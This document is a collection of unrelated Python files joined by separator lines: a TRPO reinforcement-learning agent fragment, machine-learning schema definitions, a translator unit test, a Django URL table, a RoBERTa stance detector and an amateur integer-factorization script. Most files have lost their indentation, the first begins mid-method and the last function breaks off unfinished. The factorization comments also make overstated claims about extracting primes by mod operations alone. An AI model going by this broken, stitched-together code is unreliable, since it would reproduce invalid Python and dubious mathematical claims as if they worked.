while dataset_iter.epoch < self.vf_epochs:
batch = dataset_iter.__next__()
states = batch_states([b['state'] for b in batch], xp, self.phi)
if self.obs_normalizer:
states = self.obs_normalizer(states, update=False)
vs_teacher = xp.array(
[b['v_teacher'] for b in batch], dtype=xp.float32)
vs_pred = self.vf(states)
vf_loss = F.mean_squared_error(vs_pred, vs_teacher[..., None])
self.vf_optimizer.update(lambda: vf_loss)
def _compute_gain(self, action_distrib, action_distrib_old, actions, advs):
"""Compute a gain to maximize."""
prob_ratio = F.exp(action_distrib.log_prob(actions)
- action_distrib_old.log_prob(actions))
mean_entropy = F.mean(action_distrib.entropy)
surrogate_gain = F.mean(prob_ratio * advs)
return surrogate_gain + self.entropy_coef * mean_entropy
def _update_policy(self, dataset):
"""Update the policy using a given dataset.
The policy is updated via CG and line search.
"""
assert 'state' in dataset[0]
assert 'action' in dataset[0]
assert 'adv' in dataset[0]
# Use full-batch
xp = self.policy.xp
states = batch_states([b['state'] for b in dataset], xp, self.phi)
if self.obs_normalizer:
states = self.obs_normalizer(states, update=False)
actions = xp.array([b['action'] for b in dataset])
advs = xp.array([b['adv'] for b in dataset], dtype=np.float32)
if self.standardize_advantages:
mean_advs = xp.mean(advs)
std_advs = xp.std(advs)
advs = (advs - mean_advs) / (std_advs + 1e-8)
# Recompute action distributions for batch backprop
action_distrib = self.policy(states)
action_distrib_old = action_distrib.copy()
gain = self._compute_gain(
action_distrib=action_distrib,
action_distrib_old=action_distrib_old,
actions=actions,
advs=advs)
full_step = self._compute_kl_constrained_step(
action_distrib=action_distrib,
action_distrib_old=action_distrib_old,
gain=gain)
self._line_search(
full_step=full_step,
states=states,
actions=actions,
advs=advs,
action_distrib_old=action_distrib_old,
gain=gain)
def _compute_kl_constrained_step(self, action_distrib, action_distrib_old,
gain):
"""Compute a step of policy parameters with a KL constraint."""
policy_params = _get_ordered_params(self.policy)
kl = F.mean(action_distrib_old.kl(action_distrib))
# Check if kl computation fully supports double backprop
old_style_funcs = _find_old_style_function([kl])
if old_style_funcs:
raise RuntimeError("""\
Old-style functions (chainer.Function) are used to compute KL divergence.
Since TRPO requires second-order derivative of KL divergence, its computation
should be done with new-style functions (chainer.FunctionNode) only.
Found old-style functions: {}""".format(old_style_funcs))
kl_grads = chainer.grad([kl], policy_params,
enable_double_backprop=True)
assert all(g is not None for g in kl_grads), "\
The gradient contains None. The policy may have unused parameters."
flat_kl_grads = _flatten_and_concat_variables(kl_grads)
def fisher_vector_product_func(vec):
fvp = _hessian_vector_product(flat_kl_grads, policy_params, vec)
return fvp + self.conjugate_gradient_damping * vec
gain_grads = chainer.grad([gain], policy_params)
        assert all(g is not None for g in gain_grads), "\
The gradient contains None. The policy may have unused parameters."
flat_gain_grads = _flatten_and_concat_ndarrays(gain_grads)
step_direction = chainerrl.misc.conjugate_gradient(
fisher_vector_product_func, flat_gain_grads,
max_iter=self.conjugate_gradient_max_iter,
)
# We want a step size that satisfies KL(old|new) < max_kl.
# Let d = alpha * step_direction be the actual parameter updates.
# The second-order approximation of KL divergence is:
# KL(old|new) = 1/2 d^T I d + O(||d||^3),
# where I is a Fisher information matrix.
# Substitute d = alpha * step_direction and solve KL(old|new) = max_kl
# for alpha to get the step size that tightly satisfies the constraint.
dId = float(step_direction.dot(
fisher_vector_product_func(step_direction)))
scale = (2.0 * self.max_kl / (dId + 1e-8)) ** 0.5
return scale * step_direction
def _line_search(self, full_step, states, actions, advs,
action_distrib_old, gain):
"""Do line search for a safe step size."""
xp = self.policy.xp
policy_params = _get_ordered_params(self.policy)
policy_params_sizes = [param.size for param in policy_params]
policy_params_shapes = [param.shape for param in policy_params]
step_size = 1.0
flat_params = _flatten_and_concat_ndarrays(policy_params)
for i in range(self.line_search_max_backtrack + 1):
self.logger.info(
'Line search iteration: %s step size: %s', i, step_size)
new_flat_params = flat_params + step_size * full_step
new_params = _split_and_reshape_to_ndarrays(
new_flat_params,
sizes=policy_params_sizes,
shapes=policy_params_shapes,
)
_replace_params_data(policy_params, new_params)
with chainer.using_config('train', False),\
chainer.no_backprop_mode():
new_action_distrib = self.policy(states)
new_gain = self._compute_gain(
action_distrib=new_action_distrib,
action_distrib_old=action_distrib_old,
actions=actions,
advs=advs)
new_kl = F.mean(action_distrib_old.kl(new_action_distrib))
improve = new_gain.array - gain.array
self.logger.info(
'Surrogate objective improve: %s', float(improve))
self.logger.info('KL divergence: %s', float(new_kl.array))
if not xp.isfinite(new_gain.array):
self.logger.info(
"Surrogate objective is not finite. Bakctracking...")
elif not xp.isfinite(new_kl.array):
self.logger.info(
"KL divergence is not finite. Bakctracking...")
elif improve < 0:
self.logger.info(
"Surrogate objective didn't improve. Bakctracking...")
elif float(new_kl.array) > self.max_kl:
self.logger.info(
"KL divergence exceeds max_kl. Bakctracking...")
else:
self.kl_record.append(float(new_kl.array))
self.policy_step_size_record.append(step_size)
break
step_size *= 0.5
else:
self.logger.info("\
Line search couldn't find a good step size. The policy was not updated.")
self.policy_step_size_record.append(0.)
_replace_params_data(
policy_params,
_split_and_reshape_to_ndarrays(
flat_params,
sizes=policy_params_sizes,
shapes=policy_params_shapes),
)
def act_and_train(self, state, reward):
xp = self.xp
b_state = batch_states([state], xp, self.phi)
if self.obs_normalizer:
b_state = self.obs_normalizer(b_state, update=False)
# action_distrib will be recomputed when computing gradients
with chainer.using_config('train', False), chainer.no_backprop_mode():
action_distrib = self.policy(b_state)
action = chainer.cuda.to_cpu(action_distrib.sample().array)[0]
self.entropy_record.append(float(action_distrib.entropy.array))
self.logger.debug('action_distrib: %s', action_distrib)
self.logger.debug('action: %s', action)
if self.last_state is not None:
self.last_episode.append({
'state': self.last_state,
'action': self.last_action,
'reward': reward,
'next_state': state,
'nonterminal': 1.0,
})
self.last_state = state
self.last_action = action
self._update_if_dataset_is_ready()
return action
def act(self, state):
xp = self.xp
b_state = batch_states([state], xp, self.phi)
if self.obs_normalizer:
b_state = self.obs_normalizer(b_state, update=False)
with chainer.using_config('train', False), chainer.no_backprop_mode():
action_distrib = self.policy(b_state)
if self.act_deterministically:
action = chainer.cuda.to_cpu(
action_distrib.most_probable.array)[0]
else:
action = chainer.cuda.to_cpu(action_distrib.sample().array)[0]
return action
def stop_episode_and_train(self, state, reward, done=False):
assert self.last_state is not None
self.last_episode.append({
'state': self.last_state,
'action': self.last_action,
'reward': reward,
'next_state': state,
'nonterminal': 0.0 if done else 1.0,
})
self.last_state = None
self.last_action = None
self._flush_last_episode()
self.stop_episode()
self._update_if_dataset_is_ready()
def stop_episode(self):
pass
def get_statistics(self):
return [
('average_value', _mean_or_nan(self.value_record)),
('average_entropy', _mean_or_nan(self.entropy_record)),
('average_kl', _mean_or_nan(self.kl_record)),
('average_policy_step_size',
_mean_or_nan(self.policy_step_size_record)),
]
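# Illustrative training-loop sketch (not part of chainerrl): `agent` is assumed
# to be an already-constructed TRPO instance and `env` a Gym-style environment;
# only the agent interface defined above is used.
def _run_episodes(agent, env, n_episodes=10):
    for _ in range(n_episodes):
        obs = env.reset()
        reward = 0.0
        done = False
        while not done:
            action = agent.act_and_train(obs, reward)
            obs, reward, done, _ = env.step(action)
        agent.stop_episode_and_train(obs, reward, done=done)
    return agent.get_statistics()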
|
# Copyright 2019 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class _BaseResamplerImpl:
def __init__(self, operator=None, resampler=None):
self.operator = operator
self.resampler = resampler
def fit(self, X, y=None):
X, y = self.resampler.fit_resample(X, y)
self.trained_operator = self.operator.fit(X, y)
return self
def transform(self, X, y=None):
return self.trained_operator.transform(X, y)
def predict(self, X):
return self.trained_operator.predict(X)
def predict_proba(self, X):
return self.trained_operator.predict_proba(X)
def decision_function(self, X):
return self.trained_operator.decision_function(X)
_input_fit_schema = {
"type": "object",
"required": ["X", "y"],
"additionalProperties": False,
"properties": {
"X": {
"description": "Features; the outer array is over samples.",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
},
"y": {
"description": "Target class labels; the array is over samples.",
"anyOf": [
{"type": "array", "items": {"type": "number"}},
{"type": "array", "items": {"type": "string"}},
],
},
},
}
_input_transform_schema = {
"type": "object",
"required": ["X", "y"],
"additionalProperties": False,
"properties": {
"X": {
"description": "Features; the outer array is over samples.",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
},
"y": {
"description": "Target class labels; the array is over samples.",
"anyOf": [
{"type": "array", "items": {"type": "number"}},
{"type": "array", "items": {"type": "string"}},
{"enum": [None]},
],
},
},
}
_output_transform_schema = {
"description": "Output data schema for transformed data.",
"laleType": "Any",
}
_input_predict_schema = {
"type": "object",
"required": ["X"],
"additionalProperties": False,
"properties": {
"X": {
"description": "Features; the outer array is over samples.",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
}
},
}
_output_predict_schema = {
"description": "Output data schema for predictions.",
"laleType": "Any",
}
_input_predict_proba_schema = {
"type": "object",
"required": ["X"],
"additionalProperties": False,
"properties": {
"X": {
"description": "Features; the outer array is over samples.",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
}
},
}
_output_predict_proba_schema = {
"description": "Output data schema for predictions.",
"laleType": "Any",
}
_input_decision_function_schema = {
"type": "object",
"required": ["X"],
"additionalProperties": False,
"properties": {
"X": {
"description": "Features; the outer array is over samples.",
"type": "array",
"items": {"type": "array", "items": {"type": "number"}},
}
},
}
_output_decision_function_schema = {
"description": "Output data schema for predictions.",
"laleType": "Any",
}
|
import unittest
from translator import *
class TestEnglishToFrenchTranslator(unittest.TestCase):
    def test_null_value(self):
        self.assertEqual(english_to_french(None), "Please provide some text.")
    def test_valid_argument(self):
        self.assertEqual(english_to_french("Hello"), "Bonjour")
class TestFrenchToEnglishTranslator(unittest.TestCase):
    def test_null_value(self):
        self.assertEqual(french_to_english(None), "Please provide some text.")
    def test_valid_argument(self):
        self.assertEqual(french_to_english("Bonjour"), "Hello")
if __name__ == '__main__':
unittest.main()
|
import re
def collapse_whitespace(text):
""" Collapse all consecutive whitespace, newlines and tabs
in a string into single whitespaces, and strip the outer
whitespace. This will also accept an ``lxml`` element and
extract all text. """
if text is None:
return None
if hasattr(text, 'xpath'):
text = text.xpath('string()')
    text = re.sub(r'\s+', ' ', text)
return text.strip()
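# Quick illustrative examples (not part of the original module):
#   collapse_whitespace('  foo\n\tbar  ')  ->  'foo bar'
#   collapse_whitespace(None)              ->  None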
|
"""
Contains functions that load and manipulate settings
"""
import json
from configuration.server_settings import ServerSettings
from configuration.database_settings import DatabaseSettings
from configuration.backend_settings import BackendSettings
from configuration.youtube_settings import YoutubeSettings
class ApplicationSettings():
"""
Contains static settings for the application
"""
def __init__(self, settings_file='./settings.json'):
self.settings_file_name = settings_file
self.server = None
self.database = None
self.youtube = None
self.backend = None
def load(self):
"""
A method that loads all the application settings from the settings file
"""
try:
with open(self.settings_file_name, 'r') as settings_file:
content = settings_file.read()
settings_dict = json.loads(content)
self.server = ServerSettings(settings_dict['server'])
self.database = DatabaseSettings(settings_dict['database'])
self.youtube = YoutubeSettings(settings_dict['youtube'])
self.backend = BackendSettings(settings_dict['backend'])
except OSError as err:
print('OS error: {0}'.format(err))
APP_SETTINGS_INSTANCE = ApplicationSettings()
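# Illustrative notes: ApplicationSettings.load() expects a settings.json with
# the four top-level keys below; the contents of each section are placeholders
# here and depend on the ServerSettings/DatabaseSettings/YoutubeSettings/
# BackendSettings classes.
#
#   {
#     "server": {...},
#     "database": {...},
#     "youtube": {...},
#     "backend": {...}
#   }
#
# Typical usage:
#   APP_SETTINGS_INSTANCE.load()
#   server_settings = APP_SETTINGS_INSTANCE.server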
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.MaterialsDashboardView.as_view(), name='material-dashboard'),
path('list/', views.MaterialListView.as_view(), name='material-list'),
path('create/', views.MaterialCreateView.as_view(), name='material-create'),
path('create/modal/', views.MaterialModalCreateView.as_view(), name='material-create-modal'),
path('<int:pk>/', views.MaterialDetailView.as_view(), name='material-detail'),
path('<int:pk>/modal/', views.MaterialModalDetailView.as_view(), name='material-detail-modal'),
path('<int:pk>/update/', views.MaterialUpdateView.as_view(), name='material-update'),
path('<int:pk>/update/modal/', views.MaterialModalUpdateView.as_view(), name='material-update-modal'),
path('<int:pk>/delete/', views.MaterialModalDeleteView.as_view(), name='material-delete-modal'),
path('sample_series/', views.SampleSeriesListView.as_view(), name='sampleseries-list'),
path('sample_series/featured', views.FeaturedMaterialListView.as_view(), name='sampleseries-list-featured'),
path('sample_series/create/', views.SampleSeriesCreateView.as_view(), name='sampleseries-create'),
path('sample_series/create/modal', views.SampleSeriesModalCreateView.as_view(), name='sampleseries-create-modal'),
path('sample_series/<int:pk>/', views.SampleSeriesDetailView.as_view(), name='sampleseries-detail'),
path('sample_series/<int:pk>/modal/', views.SampleSeriesModalDetailView.as_view(), name='sampleseries-detail-modal'),
path('sample_series/<int:pk>/update/', views.SampleSeriesUpdateView.as_view(), name='sampleseries-update'),
path('sample_series/<int:pk>/update/modal/', views.SampleSeriesModalUpdateView.as_view(), name='sampleseries-update-modal'),
path('sample_series/<int:pk>/delete/modal/', views.SampleSeriesModalDeleteView.as_view(), name='sampleseries-delete-modal'),
path('sample_series/<int:pk>/add_composition/', views.AddCompositionView.as_view(), name='sampleseries-add-composition'),
path('sample_series/<int:pk>/duplicate/', views.SampleSeriesCreateDuplicateView.as_view(), name='sampleseries-duplicate'),
path('sample_series/<int:pk>/duplicate/modal/', views.SampleSeriesModalCreateDuplicateView.as_view(), name='sampleseries-duplicate-modal'),
path('samples/', views.SampleListView.as_view(), name='sample-list'),
path('samples/featured', views.FeaturedSampleListView.as_view(), name='sample-list-featured'),
path('samples/create/', views.SampleCreateView.as_view(), name='sample-create'),
path('samples/create/modal', views.SampleModalCreateView.as_view(), name='sample-create-modal'),
path('samples/<int:pk>/', views.SampleDetailView.as_view(), name='sample-detail'),
path('samples/<int:pk>/modal/', views.SampleModalDetailView.as_view(), name='sample-detail-modal'),
path('samples/<int:pk>/update/', views.SampleUpdateView.as_view(), name='sample-update'),
path('samples/<int:pk>/update/modal/', views.SampleModalUpdateView.as_view(), name='sample-update-modal'),
path('samples/<int:pk>/delete/modal/', views.SampleModalDeleteView.as_view(), name='sample-delete-modal'),
path('samples/<int:pk>/add_property', views.SampleAddPropertyView.as_view(), name='sample-add-property'),
path('samples/<int:pk>/add_property/modal', views.SampleModalAddPropertyView.as_view(), name='sample-add-property-modal'),
path('samples/<int:pk>/duplicate/', views.SampleCreateDuplicateView.as_view(), name='sample-duplicate'),
path('samples/<int:pk>/duplicate/modal/', views.SampleModalCreateDuplicateView.as_view(), name='sample-duplicate-modal'),
path('categories/', views.MaterialCategoryListView.as_view(), name='materialcategory-list'),
path('categories/create/', views.MaterialCategoryCreateView.as_view(), name='materialcategory-create'),
path('categories/create/modal/', views.MaterialCategoryCreateView.as_view(), name='materialcategory-create-modal'),
path('categories/<int:pk>/', views.MaterialCategoryDetailView.as_view(), name='materialcategory-detail'),
path('categories/<int:pk>/modal/', views.MaterialCategoryModalDetailView.as_view(), name='materialcategory-detail-modal'),
path('categories/<int:pk>/update/', views.MaterialCategoryUpdateView.as_view(), name='materialcategory-update'),
path('categories/<int:pk>/update/modal/', views.MaterialCategoryModalUpdateView.as_view(), name='materialcategory-update-modal'),
path('categories/<int:pk>/delete/modal/', views.MaterialCategoryModalDeleteView.as_view(), name='materialcategory-delete-modal'),
path('components/', views.ComponentListView.as_view(), name='materialcomponent-list'),
path('components/create/', views.ComponentCreateView.as_view(), name='materialcomponent-create'),
path('components/create/modal', views.ComponentModalCreateView.as_view(), name='materialcomponent-create-modal'),
path('components/<int:pk>/', views.ComponentDetailView.as_view(), name='materialcomponent-detail'),
path('components/<int:pk>/modal/', views.ComponentModalDetailView.as_view(), name='materialcomponent-detail-modal'),
path('components/<int:pk>/update/', views.ComponentUpdateView.as_view(), name='materialcomponent-update'),
path('components/<int:pk>/update/modal/', views.ComponentUpdateView.as_view(), name='materialcomponent-update-modal'),
path('components/<int:pk>/delete/modal/', views.ComponentModalDeleteView.as_view(), name='materialcomponent-delete-modal'),
path('componentgroups/', views.ComponentGroupListView.as_view(), name='materialcomponentgroup-list'),
path('componentgroups/create/', views.ComponentGroupCreateView.as_view(), name='materialcomponentgroup-create'),
path('componentgroups/create/modal/', views.ComponentGroupModalCreateView.as_view(), name='materialcomponentgroup-create-modal'),
path('componentgroups/<int:pk>/', views.ComponentGroupDetailView.as_view(), name='materialcomponentgroup-detail'),
path('componentgroups/<int:pk>/modal/', views.ComponentGroupModalDetailView.as_view(), name='materialcomponentgroup-detail-modal'),
path('componentgroups/<int:pk>/update/', views.ComponentGroupUpdateView.as_view(), name='materialcomponentgroup-update'),
path('componentgroups/<int:pk>/update/modal/', views.ComponentGroupModalUpdateView.as_view(), name='materialcomponentgroup-update-modal'),
path('componentgroups/<int:pk>/delete/modal/', views.ComponentGroupModalDeleteView.as_view(), name='materialcomponentgroup-delete-modal'),
path('properties/', views.MaterialPropertyListView.as_view(), name='materialproperty-list'),
path('properties/create/', views.MaterialPropertyCreateView.as_view(), name='materialproperty-create'),
path('properties/create/modal/', views.MaterialPropertyModalCreateView.as_view(), name='materialproperty-create-modal'),
path('properties/<int:pk>/', views.MaterialPropertyDetailView.as_view(), name='materialproperty-detail'),
path('properties/<int:pk>/modal/', views.MaterialPropertyModalDetailView.as_view(), name='materialproperty-detail-modal'),
path('properties/<int:pk>/update/', views.MaterialPropertyUpdateView.as_view(), name='materialproperty-update'),
path('properties/<int:pk>/update/modal/', views.MaterialPropertyModalUpdateView.as_view(), name='materialproperty-update-modal'),
path('properties/<int:pk>/delete/modal/', views.MaterialPropertyModalDeleteView.as_view(), name='materialproperty-delete-modal'),
path('property_values/<int:pk>/delete/modal/', views.MaterialPropertyValueModalDeleteView.as_view(), name='materialpropertyvalue-delete-modal'),
path('compositions/', views.CompositionListView.as_view(), name='composition-list'),
path('compositions/create/', views.CompositionCreateView.as_view(), name='composition-create'),
path('compositions/create/modal/', views.CompositionCreateView.as_view(), name='composition-create-modal'),
path('compositions/<int:pk>/', views.CompositionDetailView.as_view(), name='composition-detail'),
path('compositions/<int:pk>/modal/', views.CompositionModalDetailView.as_view(), name='composition-detail-modal'),
path('compositions/<int:pk>/update/', views.CompositionUpdateView.as_view(), name='composition-update'),
path('compositions/<int:pk>/update/modal', views.CompositionModalUpdateView.as_view(), name='composition-update-modal'),
path('compositions/<int:pk>/delete/', views.CompositionModalDeleteView.as_view(), name='composition-delete-modal'),
path('compositions/<int:pk>/add_component/', views.AddComponentView.as_view(), name='composition-add-component'),
path('compositions/<int:pk>/order_up/', views.CompositionOrderUpView.as_view(), name='composition-order-up'),
path('compositions/<int:pk>/order_down/', views.CompositionOrderDownView.as_view(), name='composition-order-down'),
path('materialcomponentgroups/settings/<int:pk>/add_source/', views.AddSourceView.as_view(), name='add_source'),
path('materialcomponentgroups/settings/<int:pk>/add_seasonal_variation/', views.AddSeasonalVariationView.as_view(), name='add_seasonal_variation'),
path('materialcomponentgroups/settings/<int:pk>/remove_seasonal_variation/<int:distribution_pk>/', views.RemoveSeasonalVariationView.as_view(), name='remove_seasonal_variation'),
path('weightshares/<int:pk>/delete/', views.WeightShareModalDeleteView.as_view(), name='weightshare-delete-modal'),
]
|
from . spatial_indexes import *
|
#
# Copyright (c) 2020 Expert System Iberia
#
"""Stance detector
"""
import os
import logging
from transformers import RobertaForSequenceClassification
from transformers import RobertaTokenizer
import torch
import json
import numpy as np
from esiutils import bot_describer, dictu, hashu
logger = logging.getLogger(__name__)
sentStanceReviewer_schema = {
'super_types': ['SoftwareApplication', 'Bot'],
'ident_keys': ['@type', 'name', 'dateCreated', 'softwareVersion',
'isBasedOn', 'launchConfiguration'],
'itemref_keys': ['isBasedOn']
}
def load_saved_fnc1_model(in_dir):
model = RobertaForSequenceClassification.from_pretrained(in_dir)
if torch.cuda.is_available():
model = model.cuda()
tokenizer = RobertaTokenizer.from_pretrained(in_dir)
model_meta = {}
with open(os.path.join(in_dir, 'fnc1-classifier.json')) as in_f:
model_meta = json.load(in_f)
return {
'tokenizer': tokenizer,
'model': model,
'model_meta': model_meta,
'model_info': stance_reviewer(model_meta, in_dir)
}
def stance_reviewer(model_meta, in_dir):
result = {
'@context': 'http://coinform.eu',
'@type': 'SentStanceReviewer',
'additionalType': sentStanceReviewer_schema['super_types'],
'name': 'ESI Sentence Stance Reviewer',
        'description': 'Assesses the stance between two sentences (e.g. agree, disagree, discuss); it was trained and evaluated on FNC-1, achieving 92% accuracy.',
'author': bot_describer.esiLab_organization(),
'dateCreated': '2020-01-13T15:18:00Z',
'applicationCategory': ['NLP'],
'applicationSubCategory': ['Stance Detection'],
'applicationSuite': ['Co-inform'],
'softwareRequirements': ['python', 'pytorch', 'transformers', 'RoBERTaModel', 'RoBERTaTokenizer'],
'softwareVersion': '0.1.1',
'executionEnvironment': {
**bot_describer.inspect_execution_env(),
'cuda': torch.cuda.is_available()},
'isBasedOn': [],
'launchConfiguration': {
'model': model_meta,
'model_config': bot_describer.path_as_media_object(
os.path.join(in_dir, 'config.json')),
'pytorch_model': bot_describer.path_as_media_object(
os.path.join(in_dir, 'pytorch_model.bin'))
}
}
result['identifier'] = calc_stance_reviewer_id(result)
return result
def calc_stance_reviewer_id(stance_reviewer):
"""Calculates a unique id code for a stance reviewer
:param stance_reviewer: a `SentStanceReviewer` dict
:returns: a hashcode that tries to capture the identity of the stance reviewer
:rtype: str
"""
return hashu.hash_dict(dictu.select_keys(
stance_reviewer, sentStanceReviewer_schema['ident_keys']
))
def softmax(X, theta=1.0, axis=None):
"""
Compute the softmax of each element along an axis of X.
From https://nolanbconaway.github.io/blog/2017/softmax-numpy.html
Parameters
----------
X: ND-Array. Probably should be floats.
theta (optional): float parameter, used as a multiplier
prior to exponentiation. Default = 1.0
axis (optional): axis to compute values along. Default is the
first non-singleton axis.
Returns an array the same size as X. The result will sum to 1
along the specified axis.
"""
y = np.atleast_2d(X) # make X at least 2d
if axis is None: # find axis
axis = next(j[0] for j in enumerate(y.shape) if j[1] > 1)
y = y * float(theta) # multiply y against the theta parameter,
# subtract the max for numerical stability
y = y - np.expand_dims(np.max(y, axis=axis), axis)
y = np.exp(y)
# take the sum along the specified axis
ax_sum = np.expand_dims(np.sum(y, axis=axis), axis)
p = y / ax_sum # finally: divide elementwise
if len(X.shape) == 1: # flatten if X was 1D
p = p.flatten()
return p
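# Worked example (illustrative): softmax over a 1-D array sums to 1, and a
# larger theta concentrates more mass on the maximum.
#   softmax(np.array([1.0, 2.0, 3.0]))            -> approx. [0.090, 0.245, 0.665]
#   softmax(np.array([1.0, 2.0, 3.0]), theta=2.0) -> approx. [0.016, 0.117, 0.867]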
def pad_encode(headline, body, tokenizer, max_length=50):
"""creates token ids of a uniform sequence length for a given sentence"""
tok_ids_0 = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(headline))
tok_ids_1 = tokenizer.convert_tokens_to_ids(tokenizer.tokenize(body))
tok_ids2 = tokenizer.build_inputs_with_special_tokens(tok_ids_0, tok_ids_1)
tok_types = tokenizer.create_token_type_ids_from_sequences(
tok_ids_0, tok_ids_1)
att_mask = [1 for _ in tok_ids2]
    assert len(tok_ids2) == len(tok_types), "%d != %d" % (
        len(tok_ids2), len(tok_types))
# n_spectoks = len(tok_ids2) - (len(tok_ids_0) + len(tok_ids_1))
# print('encoding pair as', len(tok_ids_0), len(tok_ids_1), n_spectoks)
if len(tok_ids2) > max_length: # need to truncate
#print('Truncating from', len(tok_ids2))
n_to_trunc = len(tok_ids2) - max_length
tot0_1 = len(tok_ids_0) + len(tok_ids_1)
assert tot0_1 > 0
n_to_trunc0 = int(n_to_trunc * (len(tok_ids_0) / tot0_1))
n_to_trunc1 = n_to_trunc - n_to_trunc0
ttids0 = tok_ids_0[:-n_to_trunc0] if n_to_trunc0 > 0 else tok_ids_0
ttids1 = tok_ids_1[:-n_to_trunc1] if n_to_trunc1 > 0 else tok_ids_1
tok_ids2 = tokenizer.build_inputs_with_special_tokens(ttids0, ttids1)
tok_types = tokenizer.create_token_type_ids_from_sequences(
ttids0, ttids1)
att_mask = [1 for _ in tok_ids2]
elif len(tok_ids2) < max_length: # need to pad
padding = []
for i in range(len(tok_ids2), max_length):
padding.append(tokenizer.pad_token_id)
att_mask += [0 for _ in padding]
tok_types += [0 for _ in padding]
tok_ids2 = tok_ids2 + padding
assert len(tok_ids2) == max_length, '%s != %s \n%s\n%s' % (
len(tok_ids2), max_length, headline, body)
assert len(att_mask) == max_length
assert len(tok_types) == max_length
return tok_ids2, att_mask, tok_types
def tokenize_batch(inputs, tok_model, max_len=50, debug=False):
assert type(inputs) == list
encoded = [pad_encode(headline, body, tokenizer=tok_model['tokenizer'],
max_length=max_len) for (headline, body) in inputs]
input_ids = torch.tensor([e[0] for e in encoded])
att_masks = torch.tensor([e[1] for e in encoded])
type_ids = torch.tensor([e[2] for e in encoded])
if debug:
print('Input_ids shape: %s' % (input_ids.shape))
if torch.cuda.is_available():
input_ids = input_ids.cuda()
att_masks = att_masks.cuda()
type_ids = type_ids.cuda()
return input_ids, att_masks, type_ids
def pred_label(inputs, tok_model, strategy="pooled", seq_len=50,
use_tok_type=True, # for RoBERTa, we need to train them first!
               debug=False):
    """Returns the stance-prediction logits for the input (headline, body) pairs, based on the `tok_model`
    :param tok_model dict with keys `tokenizer` and `model`
    :param strategy see `embedding_from_bert_output`
    """
input_ids, att_masks, type_ids = tokenize_batch(
inputs, tok_model, debug=debug, max_len=seq_len)
model = tok_model['model']
model.eval() # needed to deactivate any Dropout layers
# if debug:
logger.info('Stancepred with input_ids %s mask %s, tok_types %s' % (
input_ids.shape, att_masks.shape, type_ids.shape))
with torch.no_grad():
model_out = model(input_ids, attention_mask=att_masks,
token_type_ids=type_ids if use_tok_type else None)
assert len(model_out) == 1
return model_out[0]
def predict_stances(tokmodmeta, claim_bod_pairs):
inputs = claim_bod_pairs
meta = tokmodmeta['model_meta']
stance2i = meta['stance2i']
preds = pred_label(inputs, tokmodmeta,
seq_len=int(meta.get('seq_len')),
use_tok_type=False)
soft_preds = softmax(preds, theta=1, axis=1)
labids = soft_preds.argmax(axis=1)
max_vals = np.take_along_axis(
soft_preds,
np.expand_dims(labids, axis=1),
axis=1)
i2stance = {i: stance for stance, i in stance2i.items()}
labels = [i2stance[sid] for sid in labids]
confs = [float(mv[0]) for mv in max_vals]
assert len(labels) == len(confs), '%d != %d' % (
len(labels), len(confs))
return labels, confs
def predict_stance(tokmodmeta, claim, doc_bodies):
"""Predict stance labels for a `claim` and one or more `doc_bodies`
:param tokmodmeta: a pre-trained dict with fields
`model` the pre-trained model
`tokenizer` the tokenizer to use for encoding string inputs
`model_meta` metadata useful for configuring and identifying the
model
:param claim: str the claim for which to predict stance of documents
:param doc_bodies: list of strings. The bodies of articles for which
you want to assess stance relative to the input `claim`
:returns: a tuple of two aligned lists. The first list contains the
stance labels (one of `agree`, `disagree`, `discuss`, `unrelated`)
the second list contains confidence values for the prediction.
:rtype: tuple
"""
inputs = [(claim, docbod) for docbod in doc_bodies]
return predict_stances(tokmodmeta, inputs)
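# Usage sketch (the model bundle below is hypothetical; only its keys are taken from this module):
# tokmodmeta = {'tokenizer': tok, 'model': model,
#               'model_meta': {'stance2i': {'agree': 0, 'disagree': 1, 'discuss': 2, 'unrelated': 3},
#                              'seq_len': 50}}
# labels, confs = predict_stance(tokmodmeta, "Claim text", ["body one", "body two"])
# Both returned lists have one entry per document body.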
|
# You can import these by
# from composite_factorization import *
# Example Uses:
# In [148]: try_factorization_mod_one((1009*101)**8)
# Out[148]: [101]
# In [151]: find_prime_factor(1009732533765211)
# 239 11344301
# The 239 here is the exponent needed to expose the prime, so we can use this next example to find it
# rather quickly:
# In [152]: try_factorization_mod_one((1009732533765211)**239)
# Out[152]: [11344301]
# Another Example:
# In [323]: try_factorization_mod_one((1009*1013)**2)
# or
# In [325]: try_factorization_mod_one(1022117**2)
# Out[325]: [1009]
# In [156]: find_prime_factor(1022117)
# 2 1009
# In [720]: pow((1009*29)**4,1)
# Out[720]: 733088921637866641
# In [721]: try_factorization_mod(733088921637866641)
# Out[721]: [29, 17836, 18, 376, 12, 30, 2, 32, 128, 2, 2, 16]
# In [726]: (1009*1013)**2
# Out[726]: 1044723161689
# In [727]: try_factorization_mod(1044723161689)
# Out[727]: [1009, 24, 42, 2, 8, 2, 22, 54, 2, 4, 2]
# No factorization is used; this is a pure mod method for extracting primes from a number.
# Most factorization techniques break down numbers into their prime components. I created a method
# that breaks down a number into its composite factors, which can be rebuilt with
# build_composite_number:
# In [154]: try_factorization_mod((1009732533765211))
# Out[154]: [1, 1710, 150, 6, 256, 36, 630, 16, 2, 2]
# In [155]: build_composite_number([1, 1710, 150, 6, 256, 36, 630, 16, 2, 2])
# Out[155]: 1009732533765211
# Interestingly, I use no factorization at all to find the prime numbers, just mod operations,
# which is different from other techniques.
def try_factorization_mod(hm):
vv = []
num = hm
cr = pow(num,1,1<<(num).bit_length()-1)
while num > 1 and cr != 0:
while cr != 0:
prevcr = cr
cr = num%cr
vv.append(prevcr)
num = (num // prevcr) -1
cr = num%(1<<(num).bit_length()-1)
vv.append(num)
return vv
def try_factorization_mod_one(hm):
vv = []
num = hm
cr = pow(num,1,1<<(num).bit_length()-1)
while cr != 0:
prevcr = cr
cr = num%cr
vv.append(prevcr)
num = (num // prevcr) -1
cr = num%(1<<(num).bit_length()-1)
